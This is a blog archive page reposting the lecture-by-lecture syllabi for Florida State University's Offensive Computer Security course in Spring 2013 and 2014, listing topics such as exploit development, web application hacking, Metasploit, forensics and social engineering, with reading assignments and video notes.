Never Ending Security

It starts all here

Tag Archives: Offensive Security

Florida State University’s Offensive Computer Security Spring 2013 – CIS4930 & CIS5930


Instructors

Prof. Xiuwen Liu (homepage: http://www.cs.fsu.edu/~liux/)
W. Owen Redwood (homepage: http://ww2.cs.fsu.edu/~redwood/)

Rationale:

The primary incentive for an attacker to exploit a vulnerability, or series of vulnerabilities is to achieve a return on an investment (his/her time usually). This return need not be strictly monetary—an attacker may be interested in obtaining access to data, identities, or some other commodity that is valuable to them. The field of penetration testing involves authorized auditing and exploitation of systems to assess actual system security in order to protect against attackers. This requires thorough knowledge of vulnerabilities and how to exploit them. Thus, this course provides an introductory but comprehensive coverage of the fundamental methodologies, skills, legal issues, and tools used in white hat

Spring 2013 Lectures & Videos

This page contains all the lecture Lecture Slides and youtube videos for the Spring 2013 semester of this course.


HD Video Download:

You can download and watch each lecture for this class at the following URL.
Simply streaming them from dropbox will not work. Dropbox will cut the stream off about 1/4 of the way through the video.

Video download URL
Lecture Video Torrent

The videos are much higher quality than their youtube versions.


Course Lecture Videos / Slides / Reading:

Below you can find and watch all the course videos, required reading, and lecture slides for each lecture (where applicable). The videos hosted on youtube are lower quality than the ones avaiable for direct download (see above). On the left you can find a navigation sidebar which will help you find the lectures relevant to each meta-topic.

Week 1 (Intro / Overview):

Lecture 1: Intro, Ethics, & Overview:

[No video was recorded for this lecture due to technical difficulties]

This lecture covers the course Intro, syllabus review, distinction between hacking vs. penetration testing, ethics discussion, course motivation, threat models and some of the basics.

Resources:

Lecture 2: Linux Overview:

This lecture covers the basics to an OS, Kernel vs user space, system calls, unix permissions, ruid vs euid etc…, ext file system (for the limited focus of forensics), persistence mechanisms used by malware, and /var/log, and more.

Resources:


Week 2 (Overview / Code Auditing):

Lecture 3: Windows Overview

This lecture provides an overview of the registry and registry hives, persistence mechanisms used by malware, Portable Executable (PE) file format overview, window systems calls commonly used by malware, and the windows API.

Resources:

Lecture 4: Rootkits; Code Auditing

The first half of this lecture covers rootkits and rootkit techniques for windows and linux. The second half covers code auditing concepts like design flaws, software analysis, vulnerability identification, signed bugs (int over/under flows), incorrect use of length params (strncpy, strncat, snprintf), format strings, …

Resources:

  • [Lecture Slides]
  • Required reading:
    Chapter 0x200 up to 0x250 in HAOE.

Week 3 (Reverse Engineering Workshop Week):

Lecture 5: x86 Reverse engineering

This lecture is day one of our weeklong x86 reverse engineering workshop lead by guest lecturer Mitch Adair.

Resources:

Lecture 6:

This lecture is day two of our weeklong x86 reverse engineering workshop lead by guest lecturer Mitch Adair.

Resources:


Week 4 (Exploit Development)

Lecture 7: Fuzzing and Exploit Development 101

This lecture covers a fuzzing overview, the basics of exploit development, environment variables, stack attacks, buffer overflow, nop-sleds, etc…

Resources:

Lecture 8: Shellcode and Exploit Development 102

Lectore topics: more on writing Shellcode (linux vs windows), win32 process memory map …

Resources:


Week 5 (Exploit Dev / Networking)

Lecture 9: Exploit Development 103: SEH Exploitation, Heap Sprays, and Executable Security Mechanisms

This lecture covers SEH exploitation, heap sprays, and executable security mechanisms like ASLR, DEP/NX, Stack Cookies…

Resources:

Lecture 10: Networking 101: Data Layer, Link Layer, and IP layer

[No video was recorded for this lecture due to technical difficulties]

This lecture covers an overview of networking concepts and network security concepts. Topics covered: Wireshark, Nmap, nc, Hubs vs switches vs routers, manufacturer default logins / backdoors… ARP & dns (dnssec), proxies, weak IP vs strong IP model (RFC 1122)

Resources:


Week 6 (Networking / Web Application Hacking)

Lecture 11: Networking 102: TCP layer, Important Protocols, Services, Portscanning, ARP

[No video was recorded for this lecture due to technical difficulties]

This lecture finishes up the networking overview from last time.

Resources:

Lecture 12: Web application Hacking 101

Its a bit shorter than other videos as the class time was taken up going over homework beforehand. This lecture addresses some of the big picture with the topics covered so far, and moves into web application security topics.

Resources:


Week 7 (Web Application Hacking)

Lecture 13: Web Application Hacking 102: Big picture of topics so far, SQLi, XSS

This lecture’s topices cover HTTP proxies, SQLi and XSS
Resources:

Lecture 14: Web Application Hacking 103: SSL attacks, advanced techniques

This lecture’s topics cover SSL/TLS, Certificate Authorities, and the serious problems with the Certificate Authority infrastructure, and a history of CA hacks / breaches, and SSL hacking tools like sslstrip …

Resources:


Week 8 (Web Application Hacking / Exploit dev)

Lecture 15: Web Application Hacking 104 & Exploit Development 104

This class was two lectures in one. In the web application 104 lecture we cover topics like WAF, and IDS and how to evade them – which leads into the exploit development 104 lecture. In the exploit dev 104 section we cover topics like networking shellcode, polymorphic shellcode / encoders, and the methodology for defeating IDS/WAF

Resources:

Lecture 16: Midterm review & Exploit Development 105 (ROP)

This lecture’s first half is a review of topics for the midterm. The second half introduces Return Oriented Programming.

Resources:


Week 9: (Special Topics)

Lecture 17: The Modern History of Cyber Warfare

This lecture covers just a small sample of the major events one might consider part of the history of cyber warfare. The lecture discusses some of the potential tactical and strategic differences between traditional warfare and cyber warfare – as well as the policy and perspective hurdles we face today. This lecture happened shortly after the ground-breaking APT1 report from Mandiant.

Resources:

Lecture 18: Social Engineering

The first portion of this video is a continuation of the previous lecture on cyber warfare. Afterwards, this lecture offers a new spin on social engineering – by staring with fundamental psychological flaws in the human brain, and discussing how they can be exploited…

Resources:


Week 10 (Metaspl0it):

Lecture 19: Metasploit

This lecture covers the metasploit framework, its interfaces, basic usage, and some of its utilities, along with a brief discussion of the social-engineering toolkit (SET)…

Resources:

MIDTERM

No video for this class…

The midterm was at this point, covering lectures 1-16.


Week 11 (Post Exploitation and Forensics):

Lecture 20: Meterpreter and Post Exploitation

This lecture starts by finishing the SET discussion from last time, covers Windows access-tokens, then delves into meterpreter and post exploitation…

Resources:

Lecture 21: Volatility and Incident Response:

This lecture covers an overview of Incident Response and delves into Volatility and memory analysis..

Resources:


Week 12 (Physical Security):

Midterm / Homework recap (no lecture)

No video for this class…

The lecture was sacrified for administrative things like reviewing the midterm, homeworks, and term project expectations.

Resources:

Lecture 22: Physical Security Workshop: Lockpicking, USB mischief, and BacNET/SCADA system security

This class was an open workshop, thus there is no video for it…

This lecture covers physical security, with a hands-on workshop on lockpicking, along with a simultaneous discussion of USB-related-mischief, building hacking (BacNET / SCADA) ….

Resources:


Week 13 (Malware / Student Presentations):

Lecture 23: Advanced Malware Techniques

No video for this class…

The lecture slides have been emailed out to the students, and will not be posted online.

Student Presentations Begin

No video for this class, nor the rest of the semester…

At this point, the course lectures have concluded. The remainder of the semester is taken up by student presentations on their term projects


Week 14-15 (Student Presentations):

(No lectures)


More Information about this course can be found on:
Advertisements

Florida State University’s Offensive Computer Security Spring 2014 – CIS4930 & CIS5930


Instructors

Prof. Xiuwen Liu (homepage: http://www.cs.fsu.edu/~liux/)
W. Owen Redwood (homepage: http://ww2.cs.fsu.edu/~redwood/)

Rationale:

The primary incentive for an attacker to exploit a vulnerability, or series of vulnerabilities is to achieve a return on an investment (his/her time usually). This return need not be strictly monetary—an attacker may be interested in obtaining access to data, identities, or some other commodity that is valuable to them. The field of penetration testing involves authorized auditing and exploitation of systems to assess actual system security in order to protect against attackers. This requires thorough knowledge of vulnerabilities and how to exploit them. Thus, this course provides an introductory but comprehensive coverage of the fundamental methodologies, skills, legal issues, and tools used in white hat penetration testing, secure system administration, and incident response.

Course Lecture Videos / Slides / Reading:

Below you can find and watch all the course videos, required reading, and lecture slides for each lecture (where applicable). The videos hosted on youtube are lower quality than the ones avaiable for direct download. On the left you can find a navigation sidebar which will help you find the lectures relevant to each meta-topic.


Week 1 (Intro / Overview):

Lecture 1: Intro, Ethics, & Overview:

This lecture covers the course Intro, syllabus review, distinction between hacking vs. penetration testing, ethics discussion, course motivation, threat models and some of the basics.

Resources:

Lecture 2: Secure C Coding 101:

What you absolutely need to know about secure coding in C. C is everywhere.

Resources:


Week 2 (Secure C / Code Auditing):

Lecture 3: Secure C Coding 102:

What you absolutely need to know about secure coding in C. C is everywhere.

Resources:

Lecture 4: Code Auditing:

Auditing C Code, basic tips / strategies / and exercises

Resources:


Week 3 (Permissions Spectrum):

Holiday (No Class, Jan 20)

MLK Day Holiday

Lecture 5: The Permissions Spectrum:

Intro to Vulnerability Research topics and the Permissions spectrum.

Resources:


Week 4 (Reverse Engineering Week):

Lecture 6: Reverse Engineering Workshop 1

Guest lecturer Mitch Adair will lead a two day RE workshop, exposing students to x86 reverse engineering with IDA and CFF Explorer. Meet in the lecture room prepared (See email).
Resources:

Lecture 7: Reverse Enginerring Workshop 2:

Guest lecturer Mitch Adair will lead a two day RE workshop, exposing students to x86 reverse engineering with IDA and CFF Explorer. Meet in the lecture room prepared (See email).


Week 5 (Fuzzing Week):

Lecture 8: Fuzzing Lecture 1

Coverage of Fuzzing techniques for SDL, VR, and other applications.
[Slides]

Lecture 9: MIDTERM REVIEW:

[No class video, see slides!]

Week 6 (MIDTERM 1 and Exploit Development Week 1):

MIDTERM 1

[no video for this class]

Lecture 10: Fuzzing Lecture #2 and Exploitation Lecture 101:

PART 1:

PART 2:

There are two videos for this lecture. The first half is a wrap up of fuzzing topics. The second half the beginning of the exploit development lectures.

Resources:


Week 6 (MIDTERM 1 and Exploit Development Week 1):

Lecture 11: Exploit Development 102

Second lecture in the exploit development lecture series. Covering the very very basics of exploitation. Concept of ret2libc is covered, examples with basic exit() shellcode, and some position-independent basic shellcode.

Resources:

  • [Slides]
  • Reading:
    Read 0x500 up to 0x540 in HAOE (Writing shellcode)
    Read 0x6A0 up to 0x700 in HAOE

This class was cancelled (postponed to next week)


Week 7 (Exploit Development / Networking):

Lecture 12: Exploit Development 103

Third lecture in the exploit development lecture series. Coverage of heap and format string exploition (with demos), as well as exploit mitigations (ASLR, NX/DEP, stack cookies, EMET, etc…)

Resources:

  • [Slides]
  • Reading:
    Read 0x680 up to 0x6A0 in HAOE

Lecture 13: Networking Lecture 101:

This lecture covers an overview of networking concepts and network security concepts. Topics covered: Wireshark, Nmap, nc, Hubs vs switches vs routers, manufacturer default logins / backdoors… ARP & dns (dnssec), proxies, weak IP vs strong IP model (RFC 1122)

Resources:


Week 8 (Exploit Dev / Web Application Hacking/Security)

Lecture 14: Exploit Development 102

Resources:

  • [Slides]
  • Reading:
    Read 0x450 up to 0x500 in HAOE(27 pages)
    Read 0x540 up through 0x550 in HAOE(11 pages)
    Read Chapter 1 in WAHH (15 pages)

Lecture 15: Wireshark and Web Application Hacking/Security 101

[Video on Wireshark coming soon]

Its a bit shorter than other videos as the class time is split between this lecture and a wireshark/tcpflow demo. This lecture addresses some of the big picture with the topics covered so far, and moves into web application security topics, as well as a very basic demo using BurpSuite as a HTTP Proxy.
Resources:

Required Reading:

Related Reading:


Week 10 (Web Applications):

Lecture 16: Web Application Hacking/Security 102

Coverage of SQLi, XSS, Metacharacter Injection, OWASP top 10, and demos.
Resources:

Lecture 17: Web Application Hacking/Security 103


Week 11 (Web Applications and Exploitation):

Lecture 18: Web Application Hacking/Security 104 and Exploitation 104

This class was two lectures in one. In the web application 104 lecture we cover topics like WAF, and IDS and how to evade them – which leads into the exploit development 104 lecture. In the exploit dev 104 section we cover topics like networking shellcode, polymorphic shellcode / encoders, and the methodology for defeating IDS/WAF.
Resources:

Lecture 19: Midterm review #2 and Exploitation 105

ROP Lecture:

This lecture covers ret2libc, return chaining, ROP, how calling conventions affect ROP, how ROP is used to defeat DEP, how ASLR affects ROP, how to defeat ASLR to enable ROP, stack pivoting, and etc… This lecture is just the concepts, next time is the demos.

Resources:

Reading:


Week 12 (ROP and Metasploit):

Lecture 21: Guest Lecturer Devin Cook on ROP and a brief history of exploitation

Devin Cook presented a recap of all the exploitation techniques covered thusfar and lectured on ROP and presented demos on ROP exploitation. Lastly defenses against ROP were discussed.
Resources:

Lecture 22: Metasploit

This lecture covers the Metasploit framework. Resources:


Week 13 (MIDTERM #2 and Post Exploitation):

MIDTERM #2

[No video / lecture]

Lecture 23: Meterpreter and Post Exploitation

Post exploitation, Windows authentication / tokens, and pivoting techniques are covered. Demos of SET, Meterpreter, and etc are shared. Resources:


Week 14 (Forensics and Incident Response):

Lecture 24: Volatility and Forensics

Old video covering Volatility and performing forensic analysis on hacked machines.
Resources:

Lecture 25: Revisiting Old Topics

Wrapping up the course, revisiting old topics: stack cookies and going in depth on how they are bypassed, covering the SSL bugs, digitally signed malware, and then the big picture. Resources:


Week 15 (Last Week: Physical Security and Social Engineering):

Lecture 26: Social Engineering


More information about this course can be found on:

Offensive Computer Security Video Lectures